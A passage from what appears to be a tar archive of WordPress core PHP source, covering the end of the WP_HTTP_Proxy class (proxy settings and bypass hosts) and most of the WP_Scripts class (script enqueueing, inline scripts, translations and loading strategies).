* There are caveats to proxy support. It requires that defines be made in the wp-config.php file to
* enable proxy support. There are also a few filters that plugins can hook into for some of the
* constants.
*
* Please note that only BASIC authentication is supported by most transports.
* cURL MAY support more methods (such as NTLM authentication) depending on your environment.
*
* The constants are as follows:
* <ol>
* <li>WP_PROXY_HOST - Enable proxy support and host for connecting.</li>
* <li>WP_PROXY_PORT - Proxy port for connection. No default, must be defined.</li>
* <li>WP_PROXY_USERNAME - Proxy username, if it requires authentication.</li>
* <li>WP_PROXY_PASSWORD - Proxy password, if it requires authentication.</li>
* <li>WP_PROXY_BYPASS_HOSTS - Will prevent the hosts in this list from going through the proxy.
* You do not need to have localhost and the site host in this list, because they will not be passed
* through the proxy. The list should be presented in a comma separated list, wildcards using * are supported. Example: *.wordpress.org</li>
* </ol>
*
* An example can be as seen below.
*
* define('WP_PROXY_HOST', '192.168.84.101');
* define('WP_PROXY_PORT', '8080');
* define('WP_PROXY_BYPASS_HOSTS', 'localhost, www.example.com, *.wordpress.org');
*
* @link https://core.trac.wordpress.org/ticket/4011 Proxy support ticket in WordPress.
* @link https://core.trac.wordpress.org/ticket/14636 Allow wildcard domains in WP_PROXY_BYPASS_HOSTS
*
* @since 2.8.0
*/
#[AllowDynamicProperties]
class WP_HTTP_Proxy {
/**
* Whether proxy connection should be used.
*
* Constants which control this behavior:
*
* - `WP_PROXY_HOST`
* - `WP_PROXY_PORT`
*
* @since 2.8.0
*
* @return bool
*/
public function is_enabled() {
return defined( 'WP_PROXY_HOST' ) && defined( 'WP_PROXY_PORT' );
}
/**
* Whether authentication should be used.
*
* Constants which control this behavior:
*
* - `WP_PROXY_USERNAME`
* - `WP_PROXY_PASSWORD`
*
* @since 2.8.0
*
* @return bool
*/
public function use_authentication() {
return defined( 'WP_PROXY_USERNAME' ) && defined( 'WP_PROXY_PASSWORD' );
}
/**
* Retrieve the host for the proxy server.
*
* @since 2.8.0
*
* @return string
*/
public function host() {
if ( defined( 'WP_PROXY_HOST' ) ) {
return WP_PROXY_HOST;
}
return '';
}
/**
* Retrieve the port for the proxy server.
*
* @since 2.8.0
*
* @return string
*/
public function port() {
if ( defined( 'WP_PROXY_PORT' ) ) {
return WP_PROXY_PORT;
}
return '';
}
/**
* Retrieve the username for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function username() {
if ( defined( 'WP_PROXY_USERNAME' ) ) {
return WP_PROXY_USERNAME;
}
return '';
}
/**
* Retrieve the password for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function password() {
if ( defined( 'WP_PROXY_PASSWORD' ) ) {
return WP_PROXY_PASSWORD;
}
return '';
}
/**
* Retrieve authentication string for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function authentication() {
return $this->username() . ':' . $this->password();
}
/**
* Retrieve header string for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function authentication_header() {
return 'Proxy-Authorization: Basic ' . base64_encode( $this->authentication() );
}
/**
* Determines whether the request should be sent through a proxy.
*
* We want to keep localhost and the site URL from being sent through the proxy, because
* some proxies can not handle this. We also have the constant available for defining other
* hosts that won't be sent through the proxy.
*
* @since 2.8.0
*
* @param string $uri URL of the request.
* @return bool Whether to send the request through the proxy.
*/
public function send_through_proxy( $uri ) {
$check = parse_url( $uri );
// Malformed URL, can not process, but this could mean ssl, so let through anyway.
if ( false === $check ) {
return true;
}
$home = parse_url( get_option( 'siteurl' ) );
/**
* Filters whether to preempt sending the request through the proxy.
*
* Returning false will bypass the proxy; returning true will send
* the request through the proxy. Returning null bypasses the filter.
*
* @since 3.5.0
*
* @param bool|null $override Whether to send the request through the proxy. Default null.
* @param string $uri URL of the request.
* @param array $check Associative array result of parsing the request URL with `parse_url()`.
* @param array $home Associative array result of parsing the site URL with `parse_url()`.
*/
$result = apply_filters( 'pre_http_send_through_proxy', null, $uri, $check, $home );
if ( ! is_null( $result ) ) {
return $result;
}
if ( 'localhost' === $check['host'] || ( isset( $home['host'] ) && $home['host'] === $check['host'] ) ) {
return false;
}
if ( ! defined( 'WP_PROXY_BYPASS_HOSTS' ) ) {
return true;
}
static $bypass_hosts = null;
static $wildcard_regex = array();
if ( null === $bypass_hosts ) {
$bypass_hosts = preg_split( '|,\s*|', WP_PROXY_BYPASS_HOSTS );
if ( str_contains( WP_PROXY_BYPASS_HOSTS, '*' ) ) {
$wildcard_regex = array();
foreach ( $bypass_hosts as $host ) {
$wildcard_regex[] = str_replace( '\*', '.+', preg_quote( $host, '/' ) );
}
$wildcard_regex = '/^(' . implode( '|', $wildcard_regex ) . ')$/i';
}
}
if ( ! empty( $wildcard_regex ) ) {
return ! preg_match( $wildcard_regex, $check['host'] );
} else {
return ! in_array( $check['host'], $bypass_hosts, true );
}
}
}
class-wp-scripts-20260605024413.php 0000666 00000104060 15224151220 0012052 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* @since 2.6.0
*
* @package WordPress
* @subpackage Dependencies
*/
/**
* Core class used to register scripts.
*
* @since 2.1.0
*
* @see WP_Dependencies
*/
class WP_Scripts extends WP_Dependencies {
/**
* Base URL for scripts.
*
* Full URL with trailing slash.
*
* @since 2.6.0
* @var string
*/
public $base_url;
/**
* URL of the content directory.
*
* @since 2.8.0
* @var string
*/
public $content_url;
/**
* Default version string for scripts.
*
* @since 2.6.0
* @var string
*/
public $default_version;
/**
* Holds handles of scripts which are enqueued in footer.
*
* @since 2.8.0
* @var array
*/
public $in_footer = array();
/**
* Holds a list of script handles which will be concatenated.
*
* @since 2.8.0
* @var string
*/
public $concat = '';
/**
* Holds a string which contains script handles and their version.
*
* @since 2.8.0
* @deprecated 3.4.0
* @var string
*/
public $concat_version = '';
/**
* Whether to perform concatenation.
*
* @since 2.8.0
* @var bool
*/
public $do_concat = false;
/**
* Holds HTML markup of scripts and additional data if concatenation
* is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_html = '';
/**
* Holds inline code if concatenation is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_code = '';
/**
* Holds a list of script handles which are not in the default directory
* if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_handles = '';
/**
* Holds a string which contains handles and versions of scripts which
* are not in the default directory if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_version = '';
/**
* List of default directories.
*
* @since 2.8.0
* @var array
*/
public $default_dirs;
/**
* Holds a mapping of dependents (as handles) for a given script handle.
* Used to optimize recursive dependency tree checks.
*
* @since 6.3.0
* @var array<string, string[]>
*/
private $dependents_map = array();
/**
* Holds a reference to the delayed (non-blocking) script loading strategies.
* Used by methods that validate loading strategies.
*
* @since 6.3.0
* @var string[]
*/
private $delayed_strategies = array( 'defer', 'async' );
/**
* Constructor.
*
* @since 2.6.0
*/
public function __construct() {
$this->init();
add_action( 'init', array( $this, 'init' ), 0 );
}
/**
* Initialize the class.
*
* @since 3.4.0
*/
public function init() {
/**
* Fires when the WP_Scripts instance is initialized.
*
* @since 2.6.0
*
* @param WP_Scripts $wp_scripts WP_Scripts instance (passed by reference).
*/
do_action_ref_array( 'wp_default_scripts', array( &$this ) );
}
/**
* Prints scripts.
*
* Prints the scripts passed to it or the print queue. Also prints all necessary dependencies.
*
* @since 2.1.0
* @since 2.8.0 Added the `$group` parameter.
*
* @param string|string[]|false $handles Optional. Scripts to be printed: queue (false),
* single script (string), or multiple scripts (array of strings).
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return string[] Handles of scripts that have been printed.
*/
public function print_scripts( $handles = false, $group = false ) {
return $this->do_items( $handles, $group );
}
/**
* Prints extra scripts of a registered script.
*
* @since 2.1.0
* @since 2.8.0 Added the `$display` parameter.
* @deprecated 3.3.0
*
* @see print_extra_script()
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_scripts_l10n( $handle, $display = true ) {
_deprecated_function( __FUNCTION__, '3.3.0', 'WP_Scripts::print_extra_script()' );
return $this->print_extra_script( $handle, $display );
}
/**
* Prints extra scripts of a registered script.
*
* @since 3.3.0
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_extra_script( $handle, $display = true ) {
$output = $this->get_data( $handle, 'data' );
if ( ! $output ) {
return;
}
/*
* Do not print a sourceURL comment if concatenation is enabled.
*
* Extra scripts may be concatenated into a single script.
* The line-based sourceURL comments may break concatenated scripts
* and do not make sense when multiple scripts are joined together.
*/
if ( ! $this->do_concat ) {
$output .= sprintf(
"\n//# sourceURL=%s",
rawurlencode( "{$handle}-js-extra" )
);
}
if ( ! $display ) {
return $output;
}
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-extra" ) );
return true;
}
/**
* Checks whether all dependents of a given handle are in the footer.
*
* If there are no dependents, this is considered the same as if all dependents were in the footer.
*
* @since 6.4.0
*
* @param string $handle Script handle.
* @return bool Whether all dependents are in the footer.
*/
private function are_all_dependents_in_footer( $handle ) {
foreach ( $this->get_dependents( $handle ) as $dep ) {
if ( isset( $this->groups[ $dep ] ) && 0 === $this->groups[ $dep ] ) {
return false;
}
}
return true;
}
/**
* Processes a script dependency.
*
* @since 2.6.0
* @since 2.8.0 Added the `$group` parameter.
*
* @see WP_Dependencies::do_item()
*
* @param string $handle The script's registered handle.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function do_item( $handle, $group = false ) {
if ( ! parent::do_item( $handle ) ) {
return false;
}
if ( 0 === $group && $this->groups[ $handle ] > 0 ) {
$this->in_footer[] = $handle;
return false;
}
if ( false === $group && in_array( $handle, $this->in_footer, true ) ) {
$this->in_footer = array_diff( $this->in_footer, (array) $handle );
}
$obj = $this->registered[ $handle ];
if ( $obj->extra['conditional'] ?? false ) {
return false;
}
if ( null === $obj->ver ) {
$ver = '';
} else {
$ver = $obj->ver ? $obj->ver : $this->default_version;
}
if ( isset( $this->args[ $handle ] ) ) {
$ver = $ver ? $ver . '&' . $this->args[ $handle ] : $this->args[ $handle ];
}
$src = $obj->src;
$strategy = $this->get_eligible_loading_strategy( $handle );
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
if ( ! $this->is_delayed_strategy( $intended_strategy ) ) {
$intended_strategy = '';
}
/*
* Move this script to the footer if:
* 1. The script is in the header group.
* 2. The current output is the header.
* 3. The intended strategy is delayed.
* 4. The actual strategy is not delayed.
* 5. All dependent scripts are in the footer.
*/
if (
0 === $group &&
0 === $this->groups[ $handle ] &&
$intended_strategy &&
! $this->is_delayed_strategy( $strategy ) &&
$this->are_all_dependents_in_footer( $handle )
) {
$this->in_footer[] = $handle;
return false;
}
$before_script = $this->get_inline_script_tag( $handle, 'before' );
$after_script = $this->get_inline_script_tag( $handle, 'after' );
if ( $before_script || $after_script ) {
$inline_script_tag = $before_script . $after_script;
} else {
$inline_script_tag = '';
}
/*
* Prevent concatenation of scripts if the text domain is defined
* to ensure the dependency order is respected.
*/
$translations_stop_concat = ! empty( $obj->textdomain );
$translations = $this->print_translations( $handle, false );
if ( $translations ) {
/*
* The sourceURL comment is not included by WP_Scripts::print_translations()
* when `$display` is `false` to prevent issues where the script tag contents are used
* by extenders for other purposes, for example concatenated with other script content.
*
* Include the sourceURL comment here as it would be when printed directly.
*/
$source_url = rawurlencode( "{$handle}-js-translations" );
$translations .= "\n//# sourceURL={$source_url}";
$translations = wp_get_inline_script_tag( $translations, array( 'id' => "{$handle}-js-translations" ) );
}
if ( $this->do_concat ) {
/**
* Filters the script loader source.
*
* @since 2.2.0
*
* @param string $src Script loader source path.
* @param string $handle Script handle.
*/
$filtered_src = apply_filters( 'script_loader_src', $src, $handle );
if (
$this->in_default_dir( $filtered_src )
&& ( $before_script || $after_script || $translations_stop_concat || $this->is_delayed_strategy( $strategy ) )
) {
$this->do_concat = false;
// Have to print the so-far concatenated scripts right away to maintain the right order.
_print_scripts();
$this->reset();
} elseif ( $this->in_default_dir( $filtered_src ) ) {
$this->print_code .= $this->print_extra_script( $handle, false );
$this->concat .= "$handle,";
$this->concat_version .= "$handle$ver";
return true;
} else {
$this->ext_handles .= "$handle,";
$this->ext_version .= "$handle$ver";
}
}
$this->print_extra_script( $handle );
// A single item may alias a set of items, by having dependencies, but no source.
if ( ! $src ) {
if ( $inline_script_tag ) {
if ( $this->do_concat ) {
$this->print_html .= $inline_script_tag;
} else {
echo $inline_script_tag;
}
}
return true;
}
if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $this->content_url && str_starts_with( $src, $this->content_url ) ) ) {
$src = $this->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/** This filter is documented in wp-includes/class-wp-scripts.php */
$src = esc_url_raw( apply_filters( 'script_loader_src', $src, $handle ) );
if ( ! $src ) {
return true;
}
$attr = array(
'src' => $src,
'id' => "{$handle}-js",
);
if ( $strategy ) {
$attr[ $strategy ] = true;
}
if ( $intended_strategy ) {
$attr['data-wp-strategy'] = $intended_strategy;
}
// Determine fetchpriority.
$original_fetchpriority = isset( $obj->extra['fetchpriority'] ) ? $obj->extra['fetchpriority'] : null;
if ( null === $original_fetchpriority || ! $this->is_valid_fetchpriority( $original_fetchpriority ) ) {
$original_fetchpriority = 'auto';
}
$actual_fetchpriority = $this->get_highest_fetchpriority_with_dependents( $handle );
if ( null === $actual_fetchpriority ) {
// If null, it's likely this script was not explicitly enqueued, so in this case use the original priority.
$actual_fetchpriority = $original_fetchpriority;
}
if ( is_string( $actual_fetchpriority ) && 'auto' !== $actual_fetchpriority ) {
$attr['fetchpriority'] = $actual_fetchpriority;
}
if ( $original_fetchpriority !== $actual_fetchpriority ) {
$attr['data-wp-fetchpriority'] = $original_fetchpriority;
}
$tag = $translations . $before_script;
$tag .= wp_get_script_tag( $attr );
$tag .= $after_script;
/**
* Filters the HTML script tag of an enqueued script.
*
* @since 4.1.0
*
* @param string $tag The `<script>` tag for the enqueued script.
* @param string $handle The script's registered handle.
* @param string $src The script's source URL.
*/
$tag = apply_filters( 'script_loader_tag', $tag, $handle, $src );
if ( $this->do_concat ) {
$this->print_html .= $tag;
} else {
echo $tag;
}
return true;
}
/**
* Adds extra code to a registered script.
*
* @since 4.5.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param string $data String containing the JavaScript to be added.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return bool True on success, false on failure.
*/
public function add_inline_script( $handle, $data, $position = 'after' ) {
if ( ! $data ) {
return false;
}
if ( 'after' !== $position ) {
$position = 'before';
}
$script = (array) $this->get_data( $handle, $position );
$script[] = $data;
return $this->add_data( $handle, $position, $script );
}
/**
* Prints inline scripts registered for a specific handle.
*
* @since 4.5.0
* @deprecated 6.3.0 Use methods get_inline_script_tag() or get_inline_script_data() instead.
*
* @param string $handle Name of the script to print inline scripts for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @param bool $display Optional. Whether to print the script tag
* instead of just returning the script data. Default true.
* @return string|false Script data on success, false otherwise.
*/
public function print_inline_script( $handle, $position = 'after', $display = true ) {
_deprecated_function( __METHOD__, '6.3.0', 'WP_Scripts::get_inline_script_data() or WP_Scripts::get_inline_script_tag()' );
$output = $this->get_inline_script_data( $handle, $position );
if ( empty( $output ) ) {
return false;
}
if ( $display ) {
echo $this->get_inline_script_tag( $handle, $position );
}
return $output;
}
/**
* Gets data for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get data for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_data( $handle, $position = 'after' ) {
$data = $this->get_data( $handle, $position );
if ( empty( $data ) || ! is_array( $data ) ) {
return '';
}
/*
* Print sourceURL comment regardless of concatenation.
*
* Inline scripts prevent scripts from being concatenated, so
* sourceURL comments are safe to print for inline scripts.
*/
$data[] = sprintf(
'//# sourceURL=%s',
rawurlencode( "{$handle}-js-{$position}" )
);
return trim( implode( "\n", $data ), "\n" );
}
/**
* Gets tags for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get associated inline script tag for.
* Must be lowercase.
* @param string $position Optional. Whether to get tag for inline
* scripts in the before or after position. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_tag( $handle, $position = 'after' ) {
$js = $this->get_inline_script_data( $handle, $position );
if ( empty( $js ) ) {
return '';
}
$id = "{$handle}-js-{$position}";
return wp_get_inline_script_tag( $js, compact( 'id' ) );
}
/**
* Localizes a script, only if the script has already been added.
*
* @since 2.1.0
*
* @param string $handle Name of the script to attach data to.
* @param string $object_name Name of the variable that will contain the data.
* @param array $l10n Array of data to localize.
* @return bool True on success, false on failure.
*/
public function localize( $handle, $object_name, $l10n ) {
if ( 'jquery' === $handle ) {
$handle = 'jquery-core';
}
if ( is_array( $l10n ) && isset( $l10n['l10n_print_after'] ) ) { // back compat, preserve the code in 'l10n_print_after' if present.
$after = $l10n['l10n_print_after'];
unset( $l10n['l10n_print_after'] );
}
if ( ! is_array( $l10n ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $l10n, 2: wp_add_inline_script() */
__( 'The %1$s parameter must be an array. To pass arbitrary data to scripts, use the %2$s function instead.' ),
'<code>$l10n</code>',
'<code>wp_add_inline_script()</code>'
),
'5.7.0'
);
if ( false === $l10n ) {
// This should really not be needed, but is necessary for backward compatibility.
$l10n = array( $l10n );
}
}
if ( is_string( $l10n ) ) {
$l10n = html_entity_decode( $l10n, ENT_QUOTES, 'UTF-8' );
} elseif ( is_array( $l10n ) ) {
foreach ( $l10n as $key => $value ) {
if ( ! is_scalar( $value ) ) {
continue;
}
$l10n[ $key ] = html_entity_decode( (string) $value, ENT_QUOTES, 'UTF-8' );
}
}
$script = "var $object_name = " . wp_json_encode( $l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ';';
if ( ! empty( $after ) ) {
$script .= "\n$after;";
}
$data = $this->get_data( $handle, 'data' );
if ( ! empty( $data ) ) {
$script = "$data\n$script";
}
return $this->add_data( $handle, 'data', $script );
}
/**
* Sets handle group.
*
* @since 2.8.0
*
* @see WP_Dependencies::set_group()
*
* @param string $handle Name of the item. Should be unique.
* @param bool $recursion Internal flag that calling function was called recursively.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool Not already in the group or a lower group.
*/
public function set_group( $handle, $recursion, $group = false ) {
if ( isset( $this->registered[ $handle ]->args ) && 1 === $this->registered[ $handle ]->args ) {
$calculated_group = 1;
} else {
$calculated_group = (int) $this->get_data( $handle, 'group' );
}
if ( false !== $group && $calculated_group > $group ) {
$calculated_group = $group;
}
return parent::set_group( $handle, $recursion, $calculated_group );
}
/**
* Sets a translation textdomain.
*
* @since 5.0.0
* @since 5.1.0 The `$domain` parameter was made optional.
*
* @param string $handle Name of the script to register a translation domain to.
* @param string $domain Optional. Text domain. Default 'default'.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool True if the text domain was registered, false if not.
*/
public function set_translations( $handle, $domain = 'default', $path = '' ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
/** @var \_WP_Dependency $obj */
$obj = $this->registered[ $handle ];
if ( ! in_array( 'wp-i18n', $obj->deps, true ) ) {
$obj->deps[] = 'wp-i18n';
}
return $obj->set_translations( $domain, $path );
}
/**
* Prints translations set for a specific handle.
*
* @since 5.0.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param bool $display Optional. Whether to print the script
* instead of just returning it. Default true.
* @return string|false Script on success, false otherwise.
*/
public function print_translations( $handle, $display = true ) {
if ( ! isset( $this->registered[ $handle ] ) || empty( $this->registered[ $handle ]->textdomain ) ) {
return false;
}
$domain = $this->registered[ $handle ]->textdomain;
$path = '';
if ( isset( $this->registered[ $handle ]->translations_path ) ) {
$path = $this->registered[ $handle ]->translations_path;
}
$json_translations = load_script_textdomain( $handle, $domain, $path );
if ( ! $json_translations ) {
return false;
}
$output = <<<JS
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "{$domain}", {$json_translations} );
JS;
if ( $display ) {
$source_url = rawurlencode( "{$handle}-js-translations" );
$output .= "\n//# sourceURL={$source_url}";
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-translations" ) );
}
return $output;
}
/**
* Determines script dependencies.
*
* @since 2.1.0
*
* @see WP_Dependencies::all_deps()
*
* @param string|string[] $handles Item handle (string) or item handles (array of strings).
* @param bool $recursion Optional. Internal flag that function is calling itself.
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function all_deps( $handles, $recursion = false, $group = false ) {
$result = parent::all_deps( $handles, $recursion, $group );
if ( ! $recursion ) {
/**
* Filters the list of script dependencies left to print.
*
* @since 2.3.0
*
* @param string[] $to_do An array of script dependency handles.
*/
$this->to_do = apply_filters( 'print_scripts_array', $this->to_do );
}
return $result;
}
/**
* Processes items and dependencies for the head group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_head_items() {
$this->do_items( false, 0 );
return $this->done;
}
/**
* Processes items and dependencies for the footer group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_footer_items() {
$this->do_items( false, 1 );
return $this->done;
}
/**
* Whether a handle's source is in a default directory.
*
* @since 2.8.0
*
* @param string $src The source of the enqueued script.
* @return bool True if found, false if not.
*/
public function in_default_dir( $src ) {
if ( ! $this->default_dirs ) {
return true;
}
if ( str_starts_with( $src, '/' . WPINC . '/js/l10n' ) ) {
return false;
}
foreach ( (array) $this->default_dirs as $test ) {
if ( str_starts_with( $src, $test ) ) {
return true;
}
}
return false;
}
/**
* This overrides the add_data method from WP_Dependencies, to support normalizing of $args.
*
* @since 6.3.0
*
* @param string $handle Name of the item. Should be unique.
* @param string $key The data key.
* @param mixed $value The data value.
* @return bool True on success, false on failure.
*/
public function add_data( $handle, $key, $value ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
if ( 'conditional' === $key ) {
// If a dependency is declared by a conditional script, remove it.
$this->registered[ $handle ]->deps = array();
}
if ( 'strategy' === $key ) {
if ( ! empty( $value ) && ! $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Invalid strategy `%1$s` defined for `%2$s` during script registration.' ),
$value,
$handle
),
'6.3.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src && $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Cannot supply a strategy `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
$value,
$handle
),
'6.3.0'
);
return false;
}
} elseif ( 'fetchpriority' === $key ) {
if ( empty( $value ) ) {
$value = 'auto';
}
if ( ! $this->is_valid_fetchpriority( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Invalid fetchpriority `%1$s` defined for `%2$s` during script registration.' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Cannot supply a fetchpriority `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
}
}
return parent::add_data( $handle, $key, $value );
}
/**
* Gets all dependents of a script.
*
* This is not recursive.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string[] Script handles.
*/
private function get_dependents( $handle ) {
// Check if dependents map for the handle in question is present. If so, use it.
if ( isset( $this->dependents_map[ $handle ] ) ) {
return $this->dependents_map[ $handle ];
}
$dependents = array();
// Iterate over all registered scripts, finding dependents of the script passed to this method.
foreach ( $this->registered as $registered_handle => $args ) {
if ( in_array( $handle, $args->deps, true ) ) {
$dependents[] = $registered_handle;
}
}
// Add the handles dependents to the map to ease future lookups.
$this->dependents_map[ $handle ] = $dependents;
return $dependents;
}
/**
* Checks if the strategy passed is a valid delayed (non-blocking) strategy.
*
* @since 6.3.0
*
* @param string|mixed $strategy The strategy to check.
* @return bool True if $strategy is one of the delayed strategies, otherwise false.
*/
private function is_delayed_strategy( $strategy ): bool {
return in_array(
$strategy,
$this->delayed_strategies,
true
);
}
/**
* Checks if the provided fetchpriority is valid.
*
* @since 6.9.0
*
* @param string|mixed $priority Fetch priority.
* @return bool Whether valid fetchpriority.
*/
private function is_valid_fetchpriority( $priority ): bool {
return in_array( $priority, array( 'auto', 'low', 'high' ), true );
}
/**
* Gets the best eligible loading strategy for a script.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string The best eligible loading strategy.
*/
private function get_eligible_loading_strategy( $handle ) {
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
// Bail early if there is no intended strategy.
if ( ! $intended_strategy ) {
return '';
}
/*
* If the intended strategy is 'defer', limit the initial list of eligible
* strategies, since 'async' can fallback to 'defer', but not vice-versa.
*/
$initial_strategy = ( 'defer' === $intended_strategy ) ? array( 'defer' ) : null;
$eligible_strategies = $this->filter_eligible_strategies( $handle, $initial_strategy );
// Return early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return '';
}
return in_array( 'async', $eligible_strategies, true ) ? 'async' : 'defer';
}
/**
* Filter the list of eligible loading strategies for a script.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @param string[]|null $eligible_strategies Optional. The list of strategies to filter. Default null.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string[]> $stored_results Optional. An array of already computed eligible loading strategies by handle, used to increase performance in large dependency lists.
* @return string[] A list of eligible loading strategies that could be used.
*/
private function filter_eligible_strategies( $handle, $eligible_strategies = null, $checked = array(), array &$stored_results = array() ) {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If no strategies are being passed, all strategies are eligible.
if ( null === $eligible_strategies ) {
$eligible_strategies = $this->delayed_strategies;
}
// If this handle was already checked, return early.
if ( isset( $checked[ $handle ] ) ) {
return $eligible_strategies;
}
// Mark this handle as checked.
$checked[ $handle ] = true;
// If this handle isn't registered, don't filter anything and return.
if ( ! isset( $this->registered[ $handle ] ) ) {
return $eligible_strategies;
}
// If the handle is not enqueued, don't filter anything and return.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return $eligible_strategies;
}
$is_alias = (bool) ! $this->registered[ $handle ]->src;
$intended_strategy = $this->get_data( $handle, 'strategy' );
// For non-alias handles, an empty intended strategy filters all strategies.
if ( ! $is_alias && empty( $intended_strategy ) ) {
return array();
}
// Handles with inline scripts attached in the 'after' position cannot be delayed.
if ( $this->has_inline_script( $handle, 'after' ) ) {
return array();
}
// If the intended strategy is 'defer', filter out 'async'.
if ( 'defer' === $intended_strategy ) {
$eligible_strategies = array( 'defer' );
}
$dependents = $this->get_dependents( $handle );
// Recursively filter eligible strategies for dependents.
foreach ( $dependents as $dependent ) {
// Bail early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return array();
}
$eligible_strategies = $this->filter_eligible_strategies( $dependent, $eligible_strategies, $checked, $stored_results );
}
$stored_results[ $handle ] = $eligible_strategies;
return $eligible_strategies;
}
/**
* Gets the highest fetch priority for a given script and all of its dependent scripts.
*
* @since 6.9.0
* @see self::filter_eligible_strategies()
* @see WP_Script_Modules::get_highest_fetchpriority()
*
* @param string $handle Script module ID.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string> $stored_results Optional. An array of already computed max priority by handle, used to increase performance in large dependency lists.
* @return string|null Highest fetch priority for the script and its dependents.
*/
private function get_highest_fetchpriority_with_dependents( string $handle, array $checked = array(), array &$stored_results = array() ): ?string {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If there is a recursive dependency, return early.
if ( isset( $checked[ $handle ] ) ) {
return null;
}
// Mark this handle as checked to guard against infinite recursion.
$checked[ $handle ] = true;
// Abort if the script is not enqueued or a dependency of an enqueued script.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return null;
}
$fetchpriority = $this->get_data( $handle, 'fetchpriority' );
if ( ! $this->is_valid_fetchpriority( $fetchpriority ) ) {
$fetchpriority = 'auto';
}
static $priorities = array(
'low',
'auto',
'high',
);
$high_priority_index = count( $priorities ) - 1;
$highest_priority_index = (int) array_search( $fetchpriority, $priorities, true );
if ( $highest_priority_index !== $high_priority_index ) {
foreach ( $this->get_dependents( $handle ) as $dependent_handle ) {
$dependent_priority = $this->get_highest_fetchpriority_with_dependents( $dependent_handle, $checked, $stored_results );
if ( is_string( $dependent_priority ) ) {
$highest_priority_index = max(
$highest_priority_index,
(int) array_search( $dependent_priority, $priorities, true )
);
if ( $highest_priority_index === $high_priority_index ) {
break;
}
}
}
}
$stored_results[ $handle ] = $priorities[ $highest_priority_index ]; // @phpstan-ignore parameterByRef.type (We know the index is valid and that this will be a string.)
return $priorities[ $highest_priority_index ];
}
/**
* Gets data for inline scripts registered for a specific handle.
*
